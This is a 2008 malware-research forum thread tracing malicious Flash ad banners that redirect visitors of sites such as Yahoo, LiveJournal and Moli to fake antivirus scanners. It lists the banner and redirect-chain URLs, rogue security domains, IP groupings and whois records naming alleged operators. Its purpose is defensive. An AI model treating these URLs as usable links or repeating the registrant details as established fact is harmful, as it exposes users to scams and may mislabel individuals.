Help - Search - Members - Calendar
Full Version: Flash Mystery
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Pages: 1, 2, 3, 4, 5, 6
Kimberly
<h4>
Google AdSense
</h4>
2 days ago a particular post did catch my attention. Please take some time to read and analyse every phrase in depth. Bold emphasis is mine; they will compose keywords and reveal the reason of this write up.

An Apology and a Request for Help.
QUOTE
Over the weekend, on Saturday, April 5, 2008, one of our features, I is Stewpid, hit the Digg.com front page. Though we have been there before, this instance was unique in that a few spyware redirects (from TheMishMash.com, not Digg.com) were reported.

We hoped to draw attention to these reports for two reasons:

1. We hate spyware too and we wanted to apologize to the affected users; and

2. We are not tech-savy and we need help finding out how this happened. We DON'T want it happening again.

For you sleuths then, here is what we know:

a. First, our website is run and hosted on TypePad, a reputable and easy-to-use blogging platform.

b. The numbers of visitors affected was small. Though on Saturday and Sunday our approximate pageviews exceeded 170,000 there were only 35 to 40 comments/complaints about spyware, pop-up's, redirects, etc. In fact, none of us here could recreate the problem.

c. According to some Digg reader comments, affected users, after visiting the I is Stewpid page, were presented with a misleading popup. It further appears that a few were then directed to (DO NOT VISIT) imunizator.com. One Digg user mentioned as a possible cause "an .swf file from [again DO NOT VISIT] promoplexer.com." A third user said he/she was redirected to [DO NOT VISIT] antispywaredeluxe.com.

d. Shortly after we learned what was reported, we immediately contacted Google AdSense, a TheMishMash.com advertising provider, and requested assistance. We further blocked AdSense from displaying ads from imunizator.com, promoplexer.com and antispywaredeluxe.com. We do not, however, yet know whether any even advertise on AdSense.

e. The problem seemed to affect only visitors coming from Digg.com.

f. To our knowledge we have never approved pop-up advertising, whether through AdSense or otherwise, though we intend on Monday to verify that.

Obviously we have no idea at this point who, if anyone, or what, was to blame. It very well could have been something we did wrong; we just don't yet know.

The long and short of it? To the Digg users who were affected, we are sorry. To those readers with expertise and/or experience in these matters, help. Any suggestions, further information, clues, etc. is appreciated.
Everyone reading these pages and Sandi's blog will know the meaning of most bolded words and symptoms except maybe for Google AdSense. Why did I include it?

If you visit TheMishMash homepage, you will see a flash animation either on the right side and /or after the first blog post, so your thoughts will be “Hey dude that was a quick one to figure out”. Well it isn’t because if you take a peek at the source code of the page you’ll notice that they don’t serve other ads besides the Google AdSense ones.

Very important note: Below are some screenshots but the SWF file displayed is NOT malcicious, it only serves for illustration purposes.
IPB Image
IPB Image
Google advertisements are very hard to track, it's not like a banner hosted at X or Y site with a nice SWF extension. I will not explain the mechanism in depth but you get a js script from ad.afy11.net which contains the necessary details in order to display the advertisement in a "placeholder".
IPB Image
pagead2.googlesyndication.com/pagead/flash_ad_relay.swf being the placeholder and pagead2.googlesyndication.com/pagead/imgad?id=[removed by me] is the flash animation in this case.

No extension, no relevant name ... very difficult to spot something or to get the flash file scanned.

Since links inside malicious banners are encrypted and their click tag often redirects to the real site (emusic, colgate ...), fine tuning advertising in your Adsense panel will have no effect or very little because these type of malverts don't come directly from imunizator.com, promoplexer.com, etc ...

The impact of them eventually being seen in Google Adsense is huge; a lot of websites use Google Ads. Many of them only allow text based ads, which is good; others have only images and they represent a certain “danger”...

It isn't the first time that bad things happen through Google advertising and it certainly will not be the last time. I kinda suspected this way back by reading some reports on forums but it’s the first time I came across a website which exclusively uses Google adverts.

Unfortunately I don’t have any captures of malicious banners being showed through Google AdSense so I can’t prove anything for 100% sure right now. Maybe the people who got hit at TheMishMash used a proxy or Tor, one never knows.

One thing is important right now, no matter if you are an advertiser, an admin or a simple user, just keep your eyes wide open please. When you are a victim of a redirect, let us know, provide as much details as possible.

Thanks.
Kimberly
<h4>
New Banner
</h4>
A new banner we never saw showed up. Couple of screenshots below.
IPB Image
Banner.
content.yieldmanager.edgesuite.net/atoms/e7/72/8c/59/e7728c59d4060354dfcdc9eb045b6995.swf
Campaign.
staticglobalsources.com/crossdomain.xml

staticglobalsources.com/c/index.php?id=d1BMYXJCR0gzcHJDaW5rS0NkQzVoPTEyMDgyNzE0ODEmcG56Y252dGE9cWJ6dmm7NkiZuYXFlbAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=domisandry&adid=intl
______________________________

The malicious banner is an advertisement for Driveway.com, an Online File Sharing website to send large files.
IPB Image
Kimberly
<h4>
www.clubic.com & www.jeuxvideo.fr - Colgate
</h4>
Colgate banner going live on the french websites www.clubic.com and www.jeuxvideo.fr. The banner was first reported on 14th April 2008 by Sandi.

Screenshots in situ.
IPB Image
IPB Image
Note: The redirects occurs immediately as the malicious banner is present on the homepage.

Banner.
im2.smartadserver.com/272091/maxfresh_300x250_mark.swf
IPB Image IPB Image
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=mark&u=1208537690314
We also hit www.adsraise.com/mbuyers/statistics.html
Kimberly
<h4>
community.livejournal.com
</h4>
Reported by Sandi here.
IPB Image
Banner.
sixapart-images.adbureau.net/sixapart/041808_728x90_765.swf
Campaign.
statgroup.net/crossdomain.xml
statgroup.net/c/index.php?id=[removed]
profitabill.com/?cmpid=andirector&adid=x
prevedmarketing.com/?tmn=mwatmp&aid=andirector&lid=x&ax=1&ed=2&mt_info=5951_7523_2358
scanner2.malware-scan.com/18_swp/?tmn=null&aid=andirector_ma18s_mb1t&lid=x&affid=&ax=1&ed=2&mt_info=5951_7523_2358:3958_0_15359&rdr=1
bucksbill.com/.stats/refil.php?p=18&aid=andirector_ma18s_mb1t&lid=x&affid=keyin
statsgod.com/a/?lang=en&aid=andirector_ma18s_mb1t&lid=x&affid=keyin&prod_id=655&ref=
Not only I got hit by Malware Alarm but I also got a "prompt" for Spy-Shredder.
IPB Image
<h4>
profitabill.com - 80.86.84.191
</h4>
Website Title: None given
ICANN Registrar: ENOM, INC.
Created: 2008-03-25
Expires: 2009-03-25
Name Server: NS1.PROFITABILL.COM (has 1 domains)
Name Server: NS2.PROFITABILL.COM
Name Server: NS3.PROFITABILL.COM
Name Server: NS4.PROFITABILL.COM
Whois Server: whois.enom.com
Server Type: nginx
IP Location - Berlin - Berlin - Webperoni Gmbh Server Hosting
Dedicated Hosting: profitabill.com is hosted on a dedicated server

Registrant Contact:
noo
Serg Moons
moon.serg(at)gmail.com
+1.123456
Fax: +1.123456
st.1st
as, CA 90210
US
______________________________

You may notice that this time the domain is registered by Serg Moons aka "noo" and not Serge Moon as we saw on Mar 12 2008. The email addy is identical.
Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

"Serg Moon" owns about 19 other domains
moon.serg@gmail.com is associated with about 28 domains
profitabill.com
Registrant Contact:
noo
Serg Moons
moon.serg(at)gmail.com
+1.123456
Fax: +1.123456
st.1st
as, CA 90210
US

"noo" owns about 73 other domains
moon.serg(at)gmail.com is associated with about 91 domains
<h4>
moon.serg(at)gmail.com
</h4>
He sure is a busy person. We already found 28 IP's in March. Below is a list of domains registred at the same date as profitabill.com.

83.149.115.150
  1. Adsadvertisment.com
  2. Advertismentad.com
  3. Advertprofit.net
  4. Bizadsonline.net
  5. Bizadvert.net
  6. Centsprofit.com
  7. Clickcentral.net
  8. Clicksapce.com
  9. Connectionclick.net
  10. Greatad.net
  11. Greatprofit.net
  12. Marketingstorage.net
  13. Marketmediapro.net
  14. Marketonlineget.net
  15. Prevedcentral.net
  16. Revenueexplorer.net
  17. Securityclick.net
  18. Virtualcoin.net
  19. Webpreved.com
28 + 19 for moon.serg(at)gmail.com (19/73 for "noo") ... Still way to go; but maybe I might digg up some more in the upcoming days ... who knows.
Kimberly
<h4>
statsgod.com - 84.243.253.220
</h4>
Hmm, noticed I never really looked at statsgod.com before, so here's the listing. On Dec 21 2007 we already had the 8 first domains sitting on the same IP.

ICANN Registrar: TUCOWS INC.
Created: 2007-05-18
Expires: 2008-05-18
Name Server: NS1.STATSGOD.COM (has 1 domains)
Name Server: NS2.STATSGOD.COM
Whois Server: whois.tucows.com
Server Type: lighttpd/1.4.13
IP Location - Noord-holland - Amsterdam - Gfx-cust-worldstream

Registrant:
Statsgod Inc.
5439 Leesburg Park
Arlington, VA 22201
US

Domain name: STATSGOD.COM

Administrative Contact:
Hostmaster, Statsgod Inc.
5439 Leesburg Park
Arlington, VA 22201
US
(703) 379-0588

Domain servers in listed order:
NS1.STATSGOD.COM 84.243.253.219
NS2.STATSGOD.COM 84.243.253.216

Websites.
  1. Anonymbrowser.com
  2. Blablahost.com
  3. Errordigger.com
  4. Errorinspector.com
  5. Internetsupernanny.com
  6. Passwordinspector.com
  7. Performanceoptimizer.com
  8. Sellmosoft.net
  9. Statsgod.com
<h4>
profitabill.com NS servers
</h4>
ns1.profitabill.com 208.79.82.50
http://www.robtex.com/ip/208.79.82.50.html

ns2.profitabill.com 208.79.82.66
http://www.robtex.com/ip/208.79.82.66.html

ns3.profitabill.com 77.73.98.2
http://www.robtex.com/ip/77.73.98.2.html

ns4.profitabill.com 77.73.98.4
http://www.robtex.com/ip/77.73.98.4.html

<h4>
Spot the difference ...
</h4>
I need a Whois break because my head is spinning. Sandi called them lazy ... let's add rippers to that. I found back some real banners a few days ago. Left side is the fake / bad advertisement, right side is the real advertisement. Spot the difference like they say ... wink.gif

IPB Image IPB Image

IPB Image IPB Image

IPB Image IPB Image

IPB Image IPB Image
Kimberly
<h4>
scan.antispywaredeluxe.com - 67.205.93.97
</h4>
Another change very soon ?

scan.antispywaredeluxe.com/scan.php?landid=[removed]&depid=[removed]&cid=[removed]&parid=[removed]&bs=[removed]1&lang=[removed]
scan.antispywaredeluxe.com A 67.205.93.97
antispywaredeluxe.com A 67.205.75.9
ns1.us.editdns.net 74.52.212.235
ns2.us.editdns.net 72.249.105.234
ns3.us.editdns.net 64.251.10.77
ns.antispywaredeluxe.com 67.205.75.9
Kimberly
<h4>
Ressurected banner
</h4>
Reported by Sandi.
IPB Image
Campaign.
burnads.com/crossdomain.xml
burnads.com/stats.php?campaign=heldthin&u=[removed]
<h4>
Check your ActiveX settings
</h4>
A Google search revealed quite a few people who got this scam actually installed. Some websites push the install of an ActiveX control before triggering the download of a file. Do not accept the install of the ActiveX control and cancel the download of the file. Don't see any of the prompts below ? It's time to check your Internet Explorer settings then.
IPB Image
IPB Image
Check and secure your Internet Explorer.
  1. From within Internet Explorer click on the Tools menu and then click on Options.
  2. Click on the Security tab
  3. Click the Internet icon so it becomes highlighted.
  4. Click on Default Level and click Ok.
  5. Click on the Custom Level button.
    • Change the Download signed ActiveX controls to Prompt.
    • Change the Download unsigned ActiveX controls to Disable
    • Change the Initialise and script ActiveX controls not marked as safe to Disable.
    • Change the Lauching of applications and unsafe files to Prompt.
    Additional security settings.
    • Change the Installation of desktop items to Prompt.
    • Change the Launching programs and files in an IFRAME to Prompt.
    • Change the Navigate sub-frames across different domains to Prompt.
    • Change the Software channel perrmissions to Medium Safety.
    • Internet Explorer 7 users : Check all other items and make sure that they meet the (recommended) setting when applies.
    • When all these settings have been made, click on the OK button.
    • If it prompts you as to whether or not you want to save the settings, press the Yes button.
  6. Next press the Apply button and then the OK to exit the Internet Properties page.
How to Configure Enhanced Security Features for Internet Explorer from Windows XP SP2.

Just as a reminder ... these redirects affect ALL browsers (Firefox, Opera, Internet Explorer ... Mac users) so check your settings and take the appropriate steps.
Kimberly
<h4>
Lady SpeedStick "overflow"
</h4>
Lady SpeedStick malvert at it again on Yahoo - caught by Sandi.

References.

http://msmvps.com/blogs/spywaresucks/archi...26/1604820.aspx
http://msmvps.com/blogs/spywaresucks/archi...26/1605158.aspx
http://msmvps.com/blogs/spywaresucks/archi...26/1605247.aspx

Yahoo redirects are not recent, a google search reveals a lot of victim posts and I also asked for feedback a couple of months ago - Ref.
QUOTE
traveltray.com/swf/gnida.swf?campaign=upmorpheus&u=1201009699
Reported at forum.zeusnews.com - forum.ingegneri.info.
Banned Country Codes - States / Cities - IP Ranges
217.12.0.0-217.12.255.255 (Yahoo Europe)
216.109.0.0-216.109.255.255 (us.rd.yahoo.com - 216.109.118.82)
66.94.0.0-66.94.25.255 (f3.yahoofs.com - 66.94.226.22)
UK
california
milano, milan, london, dublin, barcelona
In different countries (France, Italy ...) people complain about SWF redirects in their mailbox. If you are a victim of this, please contact us.
As the title says, we got an overflow of that advertising banner, it popped up everywhere in the last weeks.
______________________________

I'm curious, I often read my own notes in order to see if I didn't omit a detail or simply to refresh my memory and today, dunno why, some things in the URL's started to catch my attention.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf

nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Getfreecar_LBLINT_2_8671/gfc_728x90.swf

nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_GetFreeCar_LBLINT_6_8671/getfreecar728x90_REVISED_07052006.swf

63.225.61.4:8080/ads/Forceup/onentirely728x90.swf

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf
<h4>
ReachWe
</h4>
ReachWe ...

From: New Type Of Fraud: Fake Advertisers
QUOTE
Greetings,

My name is Frank Collins, my position is Director of Media Purchases. I am writing you on behalf of an Advertising Agency “ReachWe”, with headquaters in Geneve, Switzerland. We are currently in the process of developing an alternative sources of traffic for our clients. Our objective, much like yours, is to help our clients reach their marketing goal and provide them with best media coverage of their products or service available on the Web.

In present we want to utilize target markets of North America, United Kingdom and Australia. In addition to these markets we strongly work with Western Europe and might be interested in Asian Markets. We would like to hear more about your traffic details, available media objects and prices. Given this information we will be able to choose the best client from for possible campaign.

The budgets for our campaigns are usually very flexible. Some of our key partners are names like: FedEx, Expedia, Avon, and Bosch to name a few. You will find my contact information below. Thanks for your time and consideration.

Frank Collins,
Director of Media Purchases
ReachWe LLC.
http://reachwe.com/
Rue Plantamour 25
1201 Geneve, Switzerland
IPB Image
IPB Image
Reachwe.com - 203.142.29.76

Website Title: Reach Western Europe - Advertising Agency
ICANN Registrar: TUCOWS INC.
Created: 2007-12-06
Expires: 2008-12-06

Name Server: NS1.HOSTICA.COM (has 15,943 domains)
Name Server: NS2.HOSTICA.COM
Name Server: NS3.HOSTICA.COM
Whois Server: whois.tucows.com

Server Type: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
IP Location - Hong Kong (sar) - Hong Kong - Webvisions (hong Kong) Ltd

Registrant:
Sphere
Falores
Athens, NA NA
GR

Domain name: REACHWE.COM

Administrative Contact:
Martin, Sten smith.realty@yahoo.com
Falores
Athens, NA NA
GR
+46.348675543 Fax: +46.348675543

Technical Contact:
Administration, Domain billing@hostica.com
21143 Hawthorne Blvd. #442
Torrance, CA 90503-4615
US
+1.3102120190 Fax: +1.8667684101

Registration Service Provider:
Hostica.Com, support@hostica.com
+1.3102120190
+1.8667684101 (fax)
http://www.hostica.com
Please contact for help regarding your Domain

Registrar of Record: TUCOWS, INC.
Record last updated on 06-Dec-2007.
Record expires on 06-Dec-2008.
Record created on 06-Dec-2007.

Domain servers in listed order:
NS2.HOSTICA.COM
NS3.HOSTICA.COM
NS1.HOSTICA.COM

Registrant Search:
  • "Sphere" owns about 55 other domains
Email Search:
  • smith.realty@yahoo.com is associated with about 9 domains
  • billing@hostica.com is associated with about 7,490 domains
  • support@hostica.com is associated with about 19,054 domains
______________________________

These variables include:
  • state
  • city area
  • day
  • hour
  • browser type
  • operating system
  • domain name
  • IP
  • Language
Huhu ... sounds familiar ain't it.
IPB Image
What worries me ...
  • Mobile Marketing
  • WAP Media
  • SMS Marketing
  • Premium SMS, short codes and keywords
  • Bar Code technologie via SMS
  • Mobile-enabled online ad units
IPB Image
Websites.
  1. P-mediaonline.com
  2. Reachwe.com
<h4>
New kid on the block - P-mediaonline.com
</h4>
P-mediaonline.com - 203.142.29.76

Website Title: Reach Western Europe - Advertising Agency
ICANN Registrar: ENOM, INC.
Created: 2008-04-07
Expires: 2009-04-07

Name Server: NS1.HONGKONG5.COM (has 95 domains)
Name Server: NS2.HONGKONG5.COM
Whois Server: whois.enom.com

Server Type: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
IP Location - Hong Kong (sar) - Hong Kong - Webvisions (hong Kong) Ltd

Registration Service Provided By: Internet and Software Limited
Contact: info@issltd.biz

Domain name: p-mediaonline.com

Registrant Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Administrative Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Technical Contact:

Thomas Canbera (lucas.martin68@gmail.com)
+380.14157364859
Fax:
Rue Plantamour 45
South Tahoe, 90001
UA

Name Servers:
NS1.HONGKONG5.COM
NS2.HONGKONG5.COM

Creation date: 07 Apr 2008 08:54:46
Expiration date: 07 Apr 2009 08:54:46

Registrant Search:
  • "Thomas Canbera" owns about 3 other domains
Email Search:
  • info@issltd.biz is associated with about 5,796 domains
  • lucas.martin68@gmail.com is associated with about 1 domain
Err ... looks familiar no ?
IPB Image
<h4>
Reminder
</h4>
  • Check your creative at AdopsTools.
  • Look up in depth the Whois details of the advertising company.
  • Seek / ask for advise and / or help if in doubt. You may contact me or Sandi for example, we don't bite. wink.gif
Kimberly
<h4>
More ReachWe ... well sort off
</h4>
Google revealed another reachwe.com email addy and thus another site. First of all something important, the site nagivation on Reachwe.com and P-mediaonline.com happens through a Flash file as a matter of fact. (See screenshots from previous post). The link in the address Bar is very important as you will notice below.

The Flash file shows Face-It Studio.
IPB Image
"Contact Us" reveals:
  • Reach Western Europe
  • Turebergs Alle
  • Stockholm
  • Sweden
  • Dean Taren - dean@reachwe.com
IPB Image
The homepage is much more questionable...
IPB Image
<h4>
pussy-juice.net - 208.179.130.78
</h4>
Website Title: Free porn video, pictures

ICANN Registrar: TUCOWS INC.
Created: 2007-11-29
Expires: 2008-11-29
Registrar Status: ok
Name Server: NS1.HOSTICA.COM (has 15,943 domains)
Name Server: NS2.HOSTICA.COM
Name Server: NS3.HOSTICA.COM
Whois Server: whois.tucows.com

Server Type: Apache/1.3.41 (Unix) mod_psoft_traffic/0.2 mod_ssl/2.8.31 OpenSSL/0.9.8b
IP Address: 208.179.130.78
IP Location - California - Los Angeles - Jatek Corporation

Registrant:
Pavel Rudenkov
Brighton Beach
New York, NA na
US

Domain name: PUSSY-JUICE.NET

Administrative Contact:
Rudenkov, Pavel smith.realty@yahoo.com
Brighton Beach
New York, NA na
US
+1.2128756783 Fax: +1.2128756783

Technical Contact:
Administration, Domain billing@hostica.com
21143 Hawthorne Blvd. #442
Torrance, CA 90503-4615
US
+1.3102120190 Fax: +1.8667684101

Registration Service Provider:
Hostica.Com, support@hostica.com
+1.3102120190
+1.8667684101 (fax)
http://www.hostica.com
Please contact support@hostica.com for help regarding your Domain
Registration.

Registrar of Record: TUCOWS, INC.
Record last updated on 29-Nov-2007.
Record expires on 29-Nov-2008.
Record created on 29-Nov-2007.

Domain servers in listed order:
NS2.HOSTICA.COM
NS3.HOSTICA.COM
NS1.HOSTICA.COM

Email Search:
  • smith.realty@yahoo.com is associated with about 9 domains
  • billing@hostica.com is associated with about 7,490 domains
  • support@hostica.com is associated with about 19,054 domains
Kimberly
<h4>
www.moli.com - Neopets
</h4>
2 unseen malverts, impersonating Neopets, are present on Moli. Moli is a networking online site for social, business and family networking like LiveJournal.

Screenshots in situ.
IPB Image
IPB Image
Banners.
atlas-ads.com/23486/728x90.swf
IPB Image
IPB Image
atlas-ads.com/23486/300x250.swf
IPB Image
Campaign.
track.trackads.net/statsa.php?campaign=23486&u=1209339077448
track.trackads.net/swf/gnida.swf?campaign=23486&u=1209339077448&
paramss=[removed]

track.trackads.net/statss.php?campaign=23486&u=1209339077448&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=[removed]&cid=[removed]&parid=[removed]&
scan.spywaredestructor.com/scan.php?landid=100&depid=&cid=&parid=&bs=1&lang=en
IPB Image
Both campaigns are the same.

<h4>
atlas-ads.com - 67.205.93.102
</h4>
Website Title: Atlas Solutions - Online Advertising: Advertiser and Publisher Ad Serving Solutions
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-10
Expires: 2009-04-10
Registrar Status: clientTransferProhibited
Name Server: NS1.ATLAS-ADS.COM (has 1 domains)
Whois Server: whois.estdomains.com

Server Type: Microsoft-IIS/6.0
IP Location - Canada - Groupe Iweb Technologies Inc

Domain Name: ATLAS-ADS.COM

Registrant:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Administrative Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Technical Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Billing Contact:
Atlas Advertising
Atlas Advertising (support@atlas-ads.com)
Okland
SF
California,10001
US
Tel. +235.122454875
Fax. +235.122454875

Domain servers in listed order:
ns1.atlas-ads.com

Creation Date: 10-Apr-2008
Expiration Date: 10-Apr-2009

Websites.
  1. Atlas-ads.com
  2. Trackads.net
Don't get fooled when you visit the homepage of atlas-ads.com, they don't have a homepage but redirect you to Atlas Solutions which is owned by Microsoft.
IPB Image
CODE
Sending request:
GET / HTTP/1.1
Host: atlas-ads.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: close

• Finding host IP address...
• Host IP address = 67.205.93.102
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1·302·Found(CR)(LF)
X-Powered-By:·PHP/5.2.5-3(CR)(LF)
Location:·http://atlassolutions.com(CR)(LF)
Content-type:·text/html(CR)(LF)
Content-Length:·0(CR)(LF)
Connection:·close(CR)(LF)
Date:·Mon,·28·Apr·2008·00:31:14·GMT(CR)(LF)
Server:·lighttpd/1.5.0(CR)(LF)
(CR)(LF)
Kimberly
<h4>
Yahoo & Lady Speedstick
</h4>
It was a busy day exchanging information with Yahoo ... but the banners "seem" to be down. We are still waiting for an official confirmation though.

<h4>
Moli & Neopets
</h4>
I just checked back and unfortunately I can't bring you good news about these malverts. They are still up and running and appear everywhere.

On the International Page ....
IPB Image
On the homepage ... We clearly see the redirect happen, track.trackads.net is listed in the status bar.
IPB Image
A new tab pops up.
IPB Image
When we click on the tab, the fake warning shows up.
IPB Image
The fake scanner in action.
IPB Image
Just for information ... fully updated OS and Internet Explorer.

<h4>
New banner
</h4>
Sandi discovered a new malicicous banner for americansingles.com
Ref

windowsxp-privacy.net - 84.252.148.213

windowsxp-privacy.net has been created the same day as xp-vista-update.net
Ref

Website Title: Google
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-25
Expires: 2009-03-25
Registrar Status: clientTransferProhibited
Name Server: MANAGEDNS1.ESTBOXES.COM (has 8,101 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: gws
IP Location - Russian Federation - Mc Host.ru
Dedicated Hosting: windowsxp-privacy.net is hosted on a dedicated server.
Kimberly
<h4>
atlas-ads.com - Colgate
</h4>
2 new Colgate banners hosted on atlas-ads.com. This is the same website as the Neopets banners.

Banners.
atlas-ads.com/89000/728x90.swf
IPB Image
IPB Image
atlas-ads.com/89000/300x250.swf
IPB Image
IPB Image
Campaign.
tracktrack.trackads.net /statsa.php?campaign=89000
The 300x250 malvert was spotted this weekend on Zap2It.com. It has been removed by the administrators.
Ref
Kimberly
<h4>
Yahoo
</h4>
Official confirmation.

The malicious advertisements have been taken down by Yahoo on 28 th April 2008 at 5:30 PM GMT.
Kimberly
<h4>
IP Updates
</h4>
190.15.73.254
  1. Antivirus-scanner.com
  2. Antivirussecuritypro.com
  3. Bestadmedia.com
  4. Bestpharmacydeals.com
  5. Bestshopz.com
  6. Bestwnvmovies.com
  7. Bucksinsoft.com
  8. Cancerno.com
  9. Cashloanprofit.com
  10. Casinodealsgalore.com
  11. Cheap-auto-deals.com
  12. Co-search.com
  13. Deuscleanerpay.com
  14. Favouriteshop.com
  15. Fileprotector.com
  16. Firstsecondsearch.com
  17. Freepcsecure.com
  18. Freetvnow.net
  19. Great4mac.com
  20. Greyhathosting.com
  21. Hebooks-service.com
  22. Infyte.com
  23. Installprovider.com
  24. Internetadaultfriend.com
  25. Keywordcpv.com
  26. Libresystm.com
  27. Magicsearcher.com
  28. Malware-crush.com
  29. Manage-search.com
  30. Marketingdungeon.com
  31. Mediatornado.com
  32. Mightyfaq.com
  33. Misc-search.com
  34. Mobilesoftmarketing.com
  35. Moneypalacecash.com
  36. Myfavouritesearch.com
  37. Myhealth-life.org
  38. Myonlinefinance.com
  39. Mytravelgeek.com
  40. Netturbopro.com
  41. Nextlastsearch.com
  42. Onestopshopz.com
  43. Opensols.com
  44. Pcsoftw.com
  45. Pcsupercharger.com
  46. Popsmedia.com
  47. Popupnukerpro.com
  48. Prenetsearch.com
  49. Privacy-scan.com
  50. Prizesforyou.com
  51. R2d2adverising.com
  52. Roller-search.com
  53. Rombic-search.com
  54. Searchcolours.com
  55. Sellmoresoft.com
  56. Shopshot.com
  57. Softwcs.com
  58. Stratosearch.com
  59. Swiftcleaner.com
  60. Tallgrass-seach.com
  61. Vitecmedia.com
  62. Windefender.com
  63. Wontu-search.com
  64. Yourteacheronline.com
  65. Zappinads.com
  66. Zooworld-search.com
c-net 190.15.73
http://www.robtex.com/cnet/190.15.73.html
______________________________

antispywaremaster.com has moved.

89.18.181.100

Server Type: nginx/0.5.32
IP Location - Noord-holland - Amsterdam - Ion
  1. Acchiappavirus.com
  2. Adiosvirus.com
  3. Ahorrememoria.com
  4. Allertaminacce.com
  5. Altalimpeza.com
  6. Anonimutente.com
  7. Antiamenazas.com
  8. Antiespiamaestro.com
  9. Antievidence.com
  10. Antispionimaestro.com
  11. Antispywareconductor.com
  12. Antispywaremaster.com
  13. Antispywaremeister.com
  14. Antivirusfiable.com
  15. Antivirusforall.com
  16. Antivirusforalla.com
  17. Antivirusfueralle.com
  18. Antivirusmagique.com
  19. Antivirusparatodos.com
  20. Apagahistorico.com
  21. Apolloantivirus.com
  22. Archivoprotector.com
  23. Archivosenestado.com
  24. Atemaiserro.com
  25. Atrapavirus.com
  26. Aucunchoixpourvirus.com
  27. Aucunefaute.com
  28. Aucuninfection.com
  29. Aucunmenace.com
  30. Aucunserreurs.com
  31. Avcompleto.com
  32. Avsecurityplus.com
  33. Avseguro.com
  34. Bandoaivirus.com
  35. Barreraintegral.com
  36. Bastioneantivirus.com
  37. Beskyttelseonline.com
  38. Bestsellerantivirus.com
  39. Blanchdisc.com
  40. Borresuspasos.com
  41. Bossedeserreurs.com
  42. Brossedesfautes.com
  43. Bugseraser.com
  44. Caiforavirus.com
  45. Ceroamenazas.com
  46. Cerovirus.com
  47. Chasseurdeserreures.com
  48. Chaubugs.com
  49. Cleanerpotente.com
  50. Cleanpctool.com
  51. Cleanuptool.com
  52. Confidentsurf.com
  53. Contenidoseguros.com
  54. Contenteraser.com
  55. Controledemenaces.com
  56. Curerrores.com
  57. Dataconfidentiality.com
  58. Defensaantivirus.com
  59. Defensecelebre.com
  60. Defensededriver.com
  61. Defensedinformation.com
  62. Defensedudisque.com
  63. Defensenetsurfage.com
  64. Defensivesystem.com
  65. Dejitarufukugen.com
  66. Dejitarukyoikira.com
  67. Dejitaruwakuchin.com
  68. Detapurotekuta.com
  69. Detaripea.com
  70. Detectaerrores.com
  71. Discoseguro.com
  72. Diskassistent.com
  73. Diskretter.com
  74. Disksaeuberung.com
  75. Disksizesaver.com
  76. Disukushuri.com
  77. Doubledefender.com
  78. Driversecurise.com
  79. Einwandfreierpc.com
  80. Eliminadordeamenazas.com
  81. Emperahogo.com
  82. Enmiendaerrores.com
  83. Equipoantiespia.com
  84. Eracheisa.com
  85. Erasutoppu.com
  86. Erreurchasseur.com
  87. Errorfighter.com
  88. Essentialeraser.com
  89. Expertdantispyware.com
  90. Exterminadordevirus.com
  91. Extremuclean.com
  92. Fairukyua.com
  93. Feilvakt.com
  94. Fejlfripc.com
  95. Ferramentadesolucao.com
  96. Festplattencleaner.com
  97. Festplattentool.com
  98. Filtredetraces.com
  99. Filtrototal.com
  100. Fixthemnow.com
  101. Foutenwacht.com
  102. Guardiandelaprivacidad.com
  103. Guardianodelpc.com
  104. Gubbishremover.com
  105. Hackerstaisaku.com
  106. Hadodoraibugado.com
  107. Harddriveguard.com
  108. Historialout.com
  109. Inhaltsaeuberung.com
  110. Inhaltspeicher.com
  111. Inmunepc.com
  112. Kakujitsutsuru.com
  113. Keinespurenlassen.com
  114. Knowhowprotection.com
  115. Konsekiauto.com
  116. Kontentsufiruta.com
  117. Kurinkonseki.com
  118. Kyoiireza.com
  119. Kyoikanshi.com
  120. Kyoryokucleaner.com
  121. Laufwerkcleaner.com
  122. Limpiapc.com
  123. Limpietodo.com
  124. Lomejorenantivirus.com
  125. Longlifepc.com
  126. Maechtigerreiniger.com
  127. Malwareschutz.com
  128. Manutencaopc.com
  129. Menacecontrole.com
  130. Menacescrubber.com
  131. Menacesprotection.com
  132. Mightycleaner.com
  133. Minnesparere.com
  134. Monitordeamenazas.com
  135. Moteurpcpro.com
  136. Mycontentassistant.com
  137. Netsurfageassure.com
  138. Nettoyeurdepc.com
